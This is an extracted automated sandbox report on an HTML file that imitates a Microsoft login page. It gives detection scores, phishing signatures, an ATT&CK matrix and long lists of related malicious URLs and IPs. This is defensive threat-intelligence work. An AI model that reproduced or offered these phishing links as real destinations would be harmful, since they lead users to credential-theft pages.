automated malware analysis report for
TRANSCRIPT
ID: 150203Sample Name:CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.htmlCookbook: default.jbsTime: 03:21:16Date: 09/07/2019Version: 26.0.0 Aquamarine
2
44
677788889
99999
101010101010101010101010131515161616171736363638393939394040414343444545454545454646
4646
4
Table of Contents
Table of ContentsAnalysis ReportCUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html
OverviewGeneral InformationDetectionConfidenceClassificationAnalysis AdviceMitre Att&ck MatrixSignature Overview
Phishing:Networking:System Summary:
Behavior GraphSimulations
Behavior and APIsAntivirus and Machine Learning Detection
Initial SampleDropped FilesUnpacked PE FilesDomainsURLs
Yara OverviewInitial SamplePCAP (Network Traffic)Dropped FilesMemory DumpsUnpacked PEs
Joe Sandbox View / ContextIPsDomainsASNJA3 FingerprintsDropped Files
ScreenshotsThumbnails
StartupCreated / dropped FilesDomains and IPs
Contacted DomainsURLs from Memory and BinariesContacted IPsPublic
Static File InfoGeneralFile Icon
Network BehaviorTCP PacketsUDP PacketsDNS QueriesDNS AnswersHTTPS Packets
Code ManipulationsStatistics
BehaviorSystem Behavior
Analysis Process: iexplore.exe PID: 4576 Parent PID: 692GeneralFile ActivitiesRegistry Activities
Analysis Process: iexplore.exe PID: 4256 Parent PID: 4576General
Copyright Joe Security LLC 2019 Page 2 of 47
4646
47
File ActivitiesRegistry Activities
Disassembly
Copyright Joe Security LLC 2019 Page 3 of 47
Analysis Report CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html
Overview
General Information
Joe Sandbox Version: 26.0.0 Aquamarine
Analysis ID: 150203
Start date: 09.07.2019
Start time: 03:21:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 10s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabledEGA enabledHDC enabledAMSI enabled
Analysis stop reason: Timeout
Detection: SUS
Classification: sus24.phis.winHTML@3/70@11/2
Copyright Joe Security LLC 2019 Page 4 of 47
Cookbook Comments: Adjust boot timeEnable AMSIFound application associated with file extension: .htmlBrowsing link: https://login.microsoftonline.com/common/reprocess?ctx=rqiiaxwro2_tuacfc_mwlscowgdswary4nfiia4hcz2e2a6o3dzeitfx48bp2dee5bewihvg6oiekcompgqe2dtvgglwblqjcxvajkq_govmr5-ozvegrfbj5n2gzlirfsjjvmxromotbg4xfiftlm3rfefowilo7lzfqu--tj7_edr9-epg4olyy6ctcndhkm2btdpisagmrgttp2onue0ughmafgjwxkw4ma6ptoo5r3n1mugoxppg8stl81vju31f1blppsnpakizeormsaub5jhs9cmsrj2stulk7juhfommmtvyrbmxskdhzsepldzbmoiuhozvhvkaoyh7vjqnlszkwmmrtn4r3lzac-rtv5fkcovcfjfdjivgazkj49jbokro3ju0kzh2bfs9qjkxgrafybipsyr1mgsdfkc1u-xeloxandmsgs8yj4lnasferoiqoc8m6p5gisfyzgxmpwt2ypyzltoipzakmjuyfg_dgfve16h2ifbg0l6wtdnz2a_gjs6sndzasqgof0an-mfjxqwent1osky59zx3tpwprfb9cvvfgixxwenwelqmj9tplrgwdm7l4kj8kyg1nzawlxcvsf34wwavk2tbvwz3o2rg4hv--6j06rrwvqk9hkhhbhrnacojwb9iklkppfx1ushz7_azrsapi5xvemoy2wga5begjjdsnwzexct82pyf6381#Browsing link: https://login.live.com/oauth20_authorize.srf?response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&scope=openid+profile+email+offline_access&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2&state=rqiiaxwsvw_tubtf4yqnbufqisqyozcbndw_fyso6fba10mj7edybe0lch1_vpgzzmtd8hewihvgyoiekcompgqe2dtvgqmsdkgseuqaghhzu9zlnvpt1tn3uymqus2hdm2wvn2fj3mlo0mgpwbpmzajazbmaaioaqvo7o7ycn7_bfdlz5pwqx83oxexxz_piav-ia6dqp1ex8r9h-n03kzvjpnjnxfdzp9f1e4i4owgfhlevljgxkteoy6oozqr0wwhgzkz8htl81vju31f1blppmnpacizasbdadbrpeyapsesqenzg0tgrhlkkc4yq4nvnhuibory3pqjzqmau9xcnd2tum4zirjjs8ngasyemrzp1hnxjrj-gh14nzimzzzl4pkbzfe_tcz4xnphkkkttwcbsrw7nq5eyzwyi9vckim7wzi6guboeg19pmrtidwyolmnm17q7wuvaibeihgv0gctducwxwa6mjqjtjxaz7czltpavetfla1zi0dhx33ma3ajxdgwas-y2pks7az9k2spzfwozmfofein5n5txovc2240wnm88dx3nd3owughuiwpnuri09lt_kgydvbtlhfr6jyviyvylvbqli5wvoghhdxc3zlxzifv7pfhfplmshzlf--vxp8uthdqj1hosqgkodydcpyejcn1yfnvn-ts261tpivwymtmn0a3ztayjnvuiy4qld-v4ssbhy9l13v9vnwv_5cgcxgssquab1k5tw7-aw2&estsfed=1&uaid=64d4ac74f6bf483c8de40b4ceaf2d3bd&signup=1&lw=1&fl=easi2&fci=4345a7b9-9a63-4910-a426-35363201d503&mkt=en-usBrowsing link: https://www.microsoft.com/en-us/servicesagreement/Browsing link: https://privacy.microsoft.com/en-us/privacystatementBrowsing link: file:///c:/users/user/desktop/cusersadminisratordocumentspagesselfsendersharedfile07092019_pdf.html2.html#
Copyright Joe Security LLC 2019 Page 5 of 47
Warnings:
Detection
Strategy Score Range Reporting Whitelisted Detection
Threshold 24 0 - 100 false
Exclude process from analysis (whitelisted): MpCmdRun.exe, sc.exe, ielowutil.exe, WMIADAP.exe, conhost.exe, CompatTelRunner.exeTCP Packets have been reduced to 100Excluded IPs from analysis (whitelisted): 2.19.38.59, 95.100.79.183, 205.185.208.52, 40.126.9.66, 40.126.9.6, 20.190.137.98, 40.126.9.8, 20.190.137.96, 13.107.246.10, 40.90.23.229, 40.90.23.224, 40.90.23.239, 20.190.129.1, 40.126.1.135, 40.126.1.167, 40.126.1.129, 23.54.112.134, 23.54.112.217, 23.10.249.10, 23.10.249.11, 152.199.19.160, 23.10.249.48, 23.10.249.27, 2.19.39.63, 152.199.19.161, 67.27.237.126, 8.248.125.254, 67.27.233.126, 67.27.235.126, 8.248.141.254, 93.184.221.240Excluded domains from analysis (whitelisted): cds.s5x3j6q5.hwcdn.net, wut.smartscreen.microsoft.com, assets.onestore.ms.edgekey.net, wut.abuse.msa.microsoft.com.nsatc.net, i.s-microsoft.com.edgekey.net, uhf.microsoft.com.edgekey.net, e11290.dspg.akamaiedge.net, Edge-Prod-AMSr3.ctrl.t-0001.t-msedge.net, www.microsoft.com-c-3.edgekey.net, login.live.com, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, standard.t-0001.t-msedge.net, acctcdnvzeuno.azureedge.net, acctcdnvzeuno.ec.azureedge.net, e10583.dspg.akamaiedge.net, uhf.microsoft.com, aadcdnoriginwus2.azureedge.net, secure.aadcdn.microsoftonline-p.com.edgekey.net, t-0001.t-msedge.net, assets.onestore.ms.akadns.net, c-s.cms.ms.akadns.net, account.msa.akadns6.net, aadcdnoriginwus2.afd.azureedge.net, e11095.dspg.akamaiedge.net, c.s-microsoft.com-c.edgekey.net, privacy.microsoft.com.edgekey.net, www.prd.aa.aadg.windows.net.nsatc.net, cs9.wpc.v0cdn.net, lgin.msa.trafficmanager.net, www.prd.aa.aadg.akadns.net, afd.t-0001.t-msedge.net, i.s-microsoft.com, a1449.dscg2.akamai.net, acctcdn.trafficmanager.net, wu.azureedge.net, www.prdtm.aadg.windows.net.nsatc.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, iecvlist.microsoft.com, go.microsoft.com, mscomajax.vo.msecnd.net, cs11.wpc.v0cdn.net, e13761.dscg.akamaiedge.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, cs22.wpc.v0cdn.net, ie9comview.vo.msecnd.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, www.prdtm.aadg.akadns.net, c.s-microsoft.com, privacy.microsoft.com, go.microsoft.com.edgekey.net, a849.dscg2.akamai.net, fe-bl02p-msa.trafficmanager.net, e13678.dscg.akamaiedge.net, www.microsoft.com, e13678.dspb.akamaiedge.netReport size getting too big, too many NtDeviceIoControlFile calls found.
Show All
Copyright Joe Security LLC 2019 Page 6 of 47
Confidence
Strategy Score Range Further Analysis Required? Confidence
Threshold 4 0 - 5 false
Analysis Advice
Ransomware
Spreading
Phishing
Banker
Trojan / Bot
Adware
Spyware
Exploiter
Evader
Miner
clean
clean
clean
clean
clean
clean
clean
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
malicious
malicious
malicious
malicious
malicious
malicious
malicious
Classification
Copyright Joe Security LLC 2019 Page 7 of 47
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis
Mitre Att&ck Matrix
Initial Access Execution PersistencePrivilegeEscalation
DefenseEvasion
CredentialAccess Discovery
LateralMovement Collection Exfiltration
Command andControl
Valid Accounts WindowsRemoteManagement
WinlogonHelper DLL
Port Monitors File SystemLogical Offsets
CredentialDumping
File andDirectoryDiscovery 1
ApplicationDeploymentSoftware
Data from LocalSystem
DataEncrypted 1
StandardCryptographicProtocol 2
ReplicationThroughRemovableMedia
ServiceExecution
Port Monitors AccessibilityFeatures
Binary Padding NetworkSniffing
ApplicationWindowDiscovery
Remote Services Data fromRemovableMedia
Exfiltration OverOther NetworkMedium
Standard Non-Application LayerProtocol 2
Drive-byCompromise
WindowsManagementInstrumentation
AccessibilityFeatures
PathInterception
Rootkit InputCapture
Query Registry WindowsRemoteManagement
Data fromNetwork SharedDrive
AutomatedExfiltration
StandardApplication LayerProtocol 2
Signature Overview
• Phishing
• Networking
• System Summary
Click to jump to signature section
Phishing:
Phishing site detected (based on favicon image match)
Found iframes
HTML body contains low number of good links
HTML title does not match URL
None HTTPS page querying sensitive user data (password, username or email)
Submit button contains javascript call
Suspicious form URL found
META author tag missing
META copyright tag missing
Networking:
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Found strings which match to known social media urls
Performs DNS lookups
Urls found in memory or binary data
Uses HTTPS
Copyright Joe Security LLC 2019 Page 8 of 47
System Summary:
Classification label
Creates files inside the user directory
Creates temporary files
Reads ini files
Spawns processes
Found graphical window changes (likely an installer)
Uses new MSVCR Dlls
Behavior Graph
ID: 150203
Sample: CUsersadminisratorDocuments...
Startdate: 09/07/2019
Architecture: WINDOWS
Score: 24
secure.aadcdn.microsoftonline-p.com
Phishing site detected(based on favicon image
match)
iexplore.exe
6 84
started
iexplore.exe
104
started
aa-hip-prod.southcentralus.cloudapp.azure.com
104.215.74.84, 443, 49733, 49734
unknown
United States
cs1227.wpc.alphacdn.net
192.229.221.185, 443, 49725, 49726
unknown
United States
13 other IPs or domains
Legend:
Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet
Hide Legend
No simulations
Behavior Graph
Simulations
Behavior and APIs
Antivirus and Machine Learning Detection
Initial Sample
Copyright Joe Security LLC 2019 Page 9 of 47
Source Detection Scanner Label Link
CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html 6% virustotal Browse
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source Detection Scanner Label Link
https://login.microsof/Desktop/CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html
0% Avira URL Cloud safe
https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.core.min_2y6puv-fhesw6oymb-
0% Avira URL Cloud safe
https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.strings-en.min_xqvbwocyraoe
0% Avira URL Cloud safe
No yara matches
No yara matches
No yara matches
No yara matches
No yara matches
Match Associated Sample Name / URL SHA 256 Detection Link Context
192.229.221.185 Skype Business VM.pdf Get hash malicious Browse
https://jglshop.com.br/?y=ZGFtaWVuY0BhdXN0cmFsaWFuYmFsbGV0LmNvbS5hdQ==&data=02|01|[email protected]|0ada4032a36546c6d13b08d6ac0f8494|363ab79152b7474a91175bf36bde2b94|0|0|636885580035963490&sdata=+0eEs7qSCBrK5wHALHN4ZON9LKqFQEk8Liayanza9jQ=&reserved=0
Get hash malicious Browse
Dropped Files
Unpacked PE Files
Domains
URLs
Yara Overview
Initial Sample
PCAP (Network Traffic)
Dropped Files
Memory Dumps
Unpacked PEs
Joe Sandbox View / Context
IPs
Copyright Joe Security LLC 2019 Page 10 of 47
New Seccure File 7.24.05 PM.xlsx Get hash malicious Browse
https://storage.googleapis.com/aoffice365-journalistically-202255390/index.html
Get hash malicious Browse
Ceisa Semo Proposal.pdf Get hash malicious Browse
hasib-musinbegovic.com/wp-includes/OneDrive/Secure/home.html
Get hash malicious Browse
https://1drv.ms/b/s!Ai3YLFZQP4zmgnQbLlTwyMGNlcOa Get hash malicious Browse
https://login-microsoftonline-com0compliance-security-alert.ml/sharepoint-online-policies/
Get hash malicious Browse
https://u10520081.ct.sendgrid.net/wf/click?upn=jYlCtn5-2BPW5ucXpaCyqStVH3HEQUa2UKlpMzTVoldFM-3D_9mVef8XBOHUAB1Yp8VbE5b6cE7OrBvd4swG8dKZc1sPHvUY2cvsa2domirFVgsA7wTpafr9ZcbLjQDgrwzRN1Sfz5gUDTAosURfQrkaiHQa9xhTrZ7vxiPsOVhaDJBvhQGmXib5DzN3yHHWyi1-2Bs4dHWxanwSL0UHC4LH5kW-2BXt-2F7dR3iEvUlCpV-2Bigo7RxS8gDytzsBNig0TTG2iACzti9Cn3fcuAB9gNnTJ0mFlqA-3D
Get hash malicious Browse
https://1drv.ms/b/s!AhJu8bKGuybLclKouKsoIXrGDx8 Get hash malicious Browse
https://user7779793e792782.z14.web.core.windows.net/index.htm?=en-US&[email protected]
Get hash malicious Browse
login.live.com.office.flagstarbancorp.myshn.net Get hash malicious Browse
https://aus01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fonedrive.live.com%2Fredir%3Fresid%3D429413BE603FA343!5758%26authkey%3D!ABt3LPTU6MynWOk%26ithint%3Dfile%252cdocx&data=02%7C01%7Cdamienc%40australianballet.com.au%7Cf3dff5c1c69746509e0c08d6ef0bf767%7C363ab79152b7474a91175bf36bde2b94%7C0%7C0%7C636959232091196729&sdata=9I2tuU2dOpmt0o7AgOaq9Wuz9mjMhKAd7LA55pbkQqQ%3D&reserved=0
Get hash malicious Browse
https://1drv.ms/b/s!AvO7bN5acODYawc9teh52z5A8HI?e=3T7pcW
Get hash malicious Browse
https://outlookloffice365user23k-secondary.z14.web.core.windows.net/d41d8cd98f00b204e9800998ecf8427e89de54095edc1a5eb8c27bdf9c492019/89de54095edc1a5eb8c27bdf9c492019/#[email protected]
Get hash malicious Browse
https://onedrive.live.com/?authkey=%21AGoRsXinDPWY5Mc&cid=4694365C78123852&id=4694365C78123852%21134&parId=root&o=OneUp
Get hash malicious Browse
www.housewittorp.com/wp-includes/images/crystal/of_nw/of_nw20-10-2019/off.sss/786f23d16213fff8ba639cedee5f69a8/login.htm?cmd=login_submit&id=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa&session=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa
Get hash malicious Browse
https://943d.app.link/ Get hash malicious Browse
https://protection.office.com/threatexplorer#/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=allemail&query-CanonicalizedUrl=https://onedrive.live.com/?authkey=%21AKOGMaypqRvjuxE&cid=30A2F54D2B9B8460&id=30A2F54D2B9B8460%21170&parId=root&o=OneUp
Get hash malicious Browse
CRY INV#98634.htm Get hash malicious Browse
104.215.74.84 #43409.htm Get hash malicious Browse
email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ
Get hash malicious Browse
Match Associated Sample Name / URL SHA 256 Detection Link Context
Copyright Joe Security LLC 2019 Page 11 of 47
email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ
Get hash malicious Browse
https://exchange3564.xyz/.d/?email Get hash malicious Browse
Skype Business VM.pdf Get hash malicious Browse
https://u10269907.ct.sendgrid.net/wf/click?upn=7TnevfDNdxZp2Q3ysQ7X3oESB0-2FDPAHHGrCSuhANFl0RiIaXTQqc14zMc-2FpX9M8w_fxDop4UK-2FXWtvz-2Fo4SgBilCRDsINTKa-2BV6WoX7TCamBzN4Y3OFVxfYIFnMjo2oF0yanJFKyei-2FKbXVFZy2wWdw2BISVfQ0uuj040ducQ3e4x0ReqX-2BeavUyA3qBOBoptIxux6KHZnY0imx8tUJ6aPUBf7V4AQsKN3qI-2FJUs5ka5TGYo3JtEVvh56ieL-2BftMts8GVieoN5pgiQgMOSfl-2FS3as8UhjMRUwml-2Btsxw6bkw-3D
Get hash malicious Browse
86741.com/image/index.html Get hash malicious Browse
https://storage.googleapis.com/aoffice365-journalistically-202255390/index.html
Get hash malicious Browse
hasib-musinbegovic.com/wp-includes/OneDrive/Secure/home.html
Get hash malicious Browse
https://login-microsoftonline-com0compliance-security-alert.ml/sharepoint-online-policies/
Get hash malicious Browse
https://u10520081.ct.sendgrid.net/wf/click?upn=jYlCtn5-2BPW5ucXpaCyqStVH3HEQUa2UKlpMzTVoldFM-3D_9mVef8XBOHUAB1Yp8VbE5b6cE7OrBvd4swG8dKZc1sPHvUY2cvsa2domirFVgsA7wTpafr9ZcbLjQDgrwzRN1Sfz5gUDTAosURfQrkaiHQa9xhTrZ7vxiPsOVhaDJBvhQGmXib5DzN3yHHWyi1-2Bs4dHWxanwSL0UHC4LH5kW-2BXt-2F7dR3iEvUlCpV-2Bigo7RxS8gDytzsBNig0TTG2iACzti9Cn3fcuAB9gNnTJ0mFlqA-3D
Get hash malicious Browse
https://user7779793e792782.z14.web.core.windows.net/index.htm?=en-US&[email protected]
Get hash malicious Browse
parsintelligent.com/layouts/joomla/content/OFFICE01/office.htm
Get hash malicious Browse
email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ
Get hash malicious Browse
https://xoaoomoaiaopeamoznoiaib.appspot.com/bdsa/ Get hash malicious Browse
email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ
Get hash malicious Browse
https://similarities.ga/aim/redirect.php Get hash malicious Browse
www.housewittorp.com/wp-includes/images/crystal/of_nw/of_nw20-10-2019/off.sss/786f23d16213fff8ba639cedee5f69a8/login.htm?cmd=login_submit&id=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa&session=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa
Get hash malicious Browse
https://mofainriao837zaopzxoas.appspot.com/bbvx/ Get hash malicious Browse
Match Associated Sample Name / URL SHA 256 Detection Link Context
Copyright Joe Security LLC 2019 Page 12 of 47
https://943d.app.link/ Get hash malicious Browse
Match Associated Sample Name / URL SHA 256 Detection Link Context
Match Associated Sample Name / URL SHA 256 Detection Link Context
aa-hip-prod.southcentralus.cloudapp.azure.com
#43409.htm Get hash malicious Browse 104.215.74.84
email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ
Get hash malicious Browse 104.215.74.84
email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ
Get hash malicious Browse 104.215.74.84
https://exchange3564.xyz/.d/?email Get hash malicious Browse 104.215.74.84
Skype Business VM.pdf Get hash malicious Browse 104.215.74.84
https://u10269907.ct.sendgrid.net/wf/click?upn=7TnevfDNdxZp2Q3ysQ7X3oESB0-2FDPAHHGrCSuhANFl0RiIaXTQqc14zMc-2FpX9M8w_fxDop4UK-2FXWtvz-2Fo4SgBilCRDsINTKa-2BV6WoX7TCamBzN4Y3OFVxfYIFnMjo2oF0yanJFKyei-2FKbXVFZy2wWdw2BISVfQ0uuj040ducQ3e4x0ReqX-2BeavUyA3qBOBoptIxux6KHZnY0imx8tUJ6aPUBf7V4AQsKN3qI-2FJUs5ka5TGYo3JtEVvh56ieL-2BftMts8GVieoN5pgiQgMOSfl-2FS3as8UhjMRUwml-2Btsxw6bkw-3D
Get hash malicious Browse 104.215.74.84
86741.com/image/index.html Get hash malicious Browse 104.215.74.84
https://storage.googleapis.com/aoffice365-journalistically-202255390/index.html
Get hash malicious Browse 104.215.74.84
hasib-musinbegovic.com/wp-includes/OneDrive/Secure/home.html
Get hash malicious Browse 104.215.74.84
https://login-microsoftonline-com0compliance-security-alert.ml/sharepoint-online-policies/
Get hash malicious Browse 104.215.74.84
https://u10520081.ct.sendgrid.net/wf/click?upn=jYlCtn5-2BPW5ucXpaCyqStVH3HEQUa2UKlpMzTVoldFM-3D_9mVef8XBOHUAB1Yp8VbE5b6cE7OrBvd4swG8dKZc1sPHvUY2cvsa2domirFVgsA7wTpafr9ZcbLjQDgrwzRN1Sfz5gUDTAosURfQrkaiHQa9xhTrZ7vxiPsOVhaDJBvhQGmXib5DzN3yHHWyi1-2Bs4dHWxanwSL0UHC4LH5kW-2BXt-2F7dR3iEvUlCpV-2Bigo7RxS8gDytzsBNig0TTG2iACzti9Cn3fcuAB9gNnTJ0mFlqA-3D
Get hash malicious Browse 104.215.74.84
https://user7779793e792782.z14.web.core.windows.net/index.htm?=en-US&[email protected]
Get hash malicious Browse 104.215.74.84
parsintelligent.com/layouts/joomla/content/OFFICE01/office.htm
Get hash malicious Browse 104.215.74.84
email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ
Get hash malicious Browse 104.215.74.84
https://xoaoomoaiaopeamoznoiaib.appspot.com/bdsa/ Get hash malicious Browse 104.215.74.84
Domains
Copyright Joe Security LLC 2019 Page 13 of 47
email.veromailer.com/c/eJxdkMFugzAQRL8GLlGQbSDAgUPaJJdKVQ-VckSOvYFNjU1th6h_X0OVlFbyYTUz3nlawfuBY6uj_MmCwAFB-0aanmOQdvXPlAjTx-I3CUFUjbueLiD8FDuCChGIZc3TklTL7Mgtco9mXvdstLdGxVgzQitCaUEpI_kmocmuymlOM7LPSEqzwz7KyAh2qldgZ4CuFqUs5AkyCC2QZtU5o1IUrKCFZJJzuuxd0EWsfLMwItwiVq3urKruvB9clG4jdghPmRb12nXcwmBQ-3STa-PxjGLGd0n7GVLmHAQI3jrQPcxgxLb-uFreG4UjBPh2Iv9_uMGaCarRvIeJ7OUCynVXtzpy16FuvdGrd2OUW37yX8McfoWbU-A92D8u9IPiHh47l-Z9bFBOVp4WZcG-AZIwqJQ
Get hash malicious Browse 104.215.74.84
https://similarities.ga/aim/redirect.php Get hash malicious Browse 104.215.74.84
www.housewittorp.com/wp-includes/images/crystal/of_nw/of_nw20-10-2019/off.sss/786f23d16213fff8ba639cedee5f69a8/login.htm?cmd=login_submit&id=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa&session=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa
Get hash malicious Browse 104.215.74.84
https://mofainriao837zaopzxoas.appspot.com/bbvx/ Get hash malicious Browse 104.215.74.84
https://943d.app.link/ Get hash malicious Browse 104.215.74.84
cs1227.wpc.alphacdn.net Skype Business VM.pdf Get hash malicious Browse 192.229.221.185
https://jglshop.com.br/?y=ZGFtaWVuY0BhdXN0cmFsaWFuYmFsbGV0LmNvbS5hdQ==&data=02|01|[email protected]|0ada4032a36546c6d13b08d6ac0f8494|363ab79152b7474a91175bf36bde2b94|0|0|636885580035963490&sdata=+0eEs7qSCBrK5wHALHN4ZON9LKqFQEk8Liayanza9jQ=&reserved=0
Get hash malicious Browse 192.229.221.185
New Seccure File 7.24.05 PM.xlsx Get hash malicious Browse 192.229.221.185
https://storage.googleapis.com/aoffice365-journalistically-202255390/index.html
Get hash malicious Browse 192.229.221.185
Ceisa Semo Proposal.pdf Get hash malicious Browse 192.229.221.185
hasib-musinbegovic.com/wp-includes/OneDrive/Secure/home.html
Get hash malicious Browse 192.229.221.185
https://1drv.ms/b/s!Ai3YLFZQP4zmgnQbLlTwyMGNlcOa Get hash malicious Browse 192.229.221.185
https://login-microsoftonline-com0compliance-security-alert.ml/sharepoint-online-policies/
Get hash malicious Browse 192.229.221.185
